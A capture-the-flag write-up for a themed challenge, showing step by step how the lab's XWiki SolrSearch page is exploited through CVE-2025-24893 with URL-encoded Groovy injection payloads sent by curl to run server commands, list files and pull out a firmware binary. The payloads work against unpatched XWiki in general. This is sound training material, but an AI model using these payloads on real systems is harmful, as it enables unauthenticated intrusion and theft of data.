Skip to content

Chapter 2: The Vendor

Category: SolrSearch    |    Points: 2    |    Difficulty: Easy

🧠 Challenge Text

Hi, emergency troubleshooter,

recent studies suggest that the intense heat and hard labor of solar technicians often trigger strange, vivid dreams about the future of energetics. Over the past few days, technicians have woken up night after night with the same terrifying screams "Look, up in the sky! It’s a bird! It’s a plane! It’s Superman! Let’s roast it anyway!".

Find out what’s going on, we need our technicians to stay sane.

Stay grounded!

  • http://intro.falcon.powergrid.tcc/

🔍 Hints Text

1. Hint Be sure you enter flag for correct chapter.
2. Hint In this realm, challenges should be conquered in a precise order, and to triumph over some, you'll need artifacts acquired from others - a unique twist that defies the norms of typical CTF challenges.
3. Hint Chapter haiku will lead you.

🎨 Solution

Checking the vendor page, solrsearch search box could be found at http://thevendor.falcon.powergrid.tcc/xwiki/bin/view/Main/SolrSearch. Let's try test printenv command injections.

$ curl -s "http://thevendor.falcon.powergrid.tcc/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22printenv%20FLAG%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d" | grep FLAG | grep -oE '({.{4}-.{4}-.{4}-.{4}\})'
{gwNd-0Klr-lsMW-YgZU}
{gwNd-0Klr-lsMW-YgZU}

CVE-2025-24893 is a critical unauthenticated remote code execution (RCE) vulnerability in XWiki, a popular open-source enterprise wiki platform.

From the haiku we can deduce that firmware sits on the server(important for next challenge). TCP reverse shell was not helpful so try to find executable firmware.

$ python3 -c "import urllib.parse, sys; print(urllib.parse.quote(sys.argv[1]))" '}}}{{async async=false}} {{groovy}}
println("find / -maxdepth 3 -name '*firmware*' -print".execute().text)
{{/groovy}} {{/async}}'

$ curl "http://thevendor.falcon.powergrid.tcc/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%20%7B%7Bgroovy%7D%7D%0Aprintln%28%22find%20/%20-maxdepth%203%20-name%20%2Afirmware%2A%20-print%22.execute%28%29.text%29%0A%7B%7B/groovy%7D%7D%20%7B%7B/async%7D%7D" | xq

<br/>    <description>RSS feed for search on [}}} /sys/class/firmware
<br/>/sys/firmware
<br/>/sys/module/firmware_class
<br/>/usr/lib/firmware
<br/>/data/firmware
<br/>/data/firmware/roostguard-firmware-0.9.bin ]</description>
<br/>    <language>en</language>
<br/>    <copyright />
<br/>    <dc:creator>XWiki</dc:creator>
<br/>    <dc:language>en</dc:language>
<br/>    <dc:rights />
<br/>  </channel>
<br/></rss>

Now we need to download content of executable /data/firmware/roostguard-firmware-0.9.bin.

$ python3 -c "import urllib.parse, sys; print(urllib.parse.quote(sys.argv[1]))" '}}}{{async async=false}} {{groovy}}
println("base64 /data/firmware/roostguard-firmware-0.9.bin".execute().text)
{{/groovy}} {{/async}}'

$ curl "http://thevendor.falcon.powergrid.tcc/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%20%7B%7Bgroovy%7D%7D%0Aprintln%28%22base64%20/data/firmware/roostguard-firmware-0.9.bin%22.execute%28%29.text%29%0A%7B%7B/groovy%7D%7D%20%7B%7B/async%7D%7D" | sed 's|</\?em>|++|g' | xq > test.html

$ touch test.b64
$ cat test.b64 | base64 -d > roostguard-firmware-0.9.bin
$ chmod +x roostguard-firmware-0.9.bin 

$ file ./roostguard-firmware-0.9.bin
./roostguard-firmware-0.9.bin: ELF 32-bit LSB executable, Atmel AVR 8-bit, version 1 (SYSV), statically linked, with debug_info, not stripped